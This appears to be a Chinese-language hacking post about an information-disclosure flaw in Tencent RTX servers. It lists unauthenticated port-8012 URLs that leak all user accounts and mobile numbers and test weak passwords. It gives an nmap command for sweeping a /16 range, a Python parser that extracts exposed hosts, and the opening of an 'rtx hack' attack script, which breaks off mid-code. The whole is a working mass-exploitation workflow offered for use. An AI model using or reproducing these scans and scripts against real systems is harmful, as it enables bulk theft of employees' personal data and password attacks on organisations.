腾讯通RTX(Real Time eXchange)是腾讯公司推出的企业级实时通信平台.
rtx server 存在暴露用户信息的漏洞,通过web访问
http://RtxServerIp:8012/userlist.php #泄漏公司所有rtx用户
http://RtxServerIp:8012/getmobile.cgi?receiver= #泄漏用户手机号
http://RtxServerIp:8012/check.php #验证弱口令
脚本化攻击思路:
sudo nmap -sS -T4 -Pn -p8012 xxx.xxx.xxx.0/16 -oX out.xml nmap 扫描大网段以基数来填补精度的不足,然后我们得到一个开着nmap扫描的out.xml文
分析out.xml文件提取开放8012端口的ip
rtx攻击脚本处理这些ip,探测弱口令
步骤2 分析nmap结果的脚本xml.py
#!/usr/bin/env python #-*- coding= utf-8 -*- import xml.etree.ElementTree as ET tree = ET.parse("out.xml") doc = tree.getroot() for x in doc: if x.tag == 'host': xlist = x.getchildren() ports = xlist[3] port = ports.getchildren()[0] state = port.getchildren()[0] if state.get('state') == 'open': print xlist[1].get('addr')
步骤3 rtx server attack 脚本
#!/usr/bin/env python #-*-coding=utf-8-*- # date : 2013.12.16 # author : l137 # rtx hack import threading import urllib import re import sys import getopt import json import threading import httplib import time def usage(): print ''' Usage : ./f.py -u target_ip -h Show this page! ''' class postThread(threading.Thread): def __init__(self, data): threading.Thread.__init__(self) self.data = data def run(self): for x in self.data: try: print self.data except Exception, e: print e class rtx(object): 'rtx attacker class' ip = '' data = '' port = '8012' fullData = '' def __init__(self, ip): if self.checkIp(ip): self.ip = ip url = "http://"+ip+":"+self.port+"/userlist.php" try: content = urllib.urlopen(url).read() self.data = json.loads(content) except (IOError,ValueError),e: print "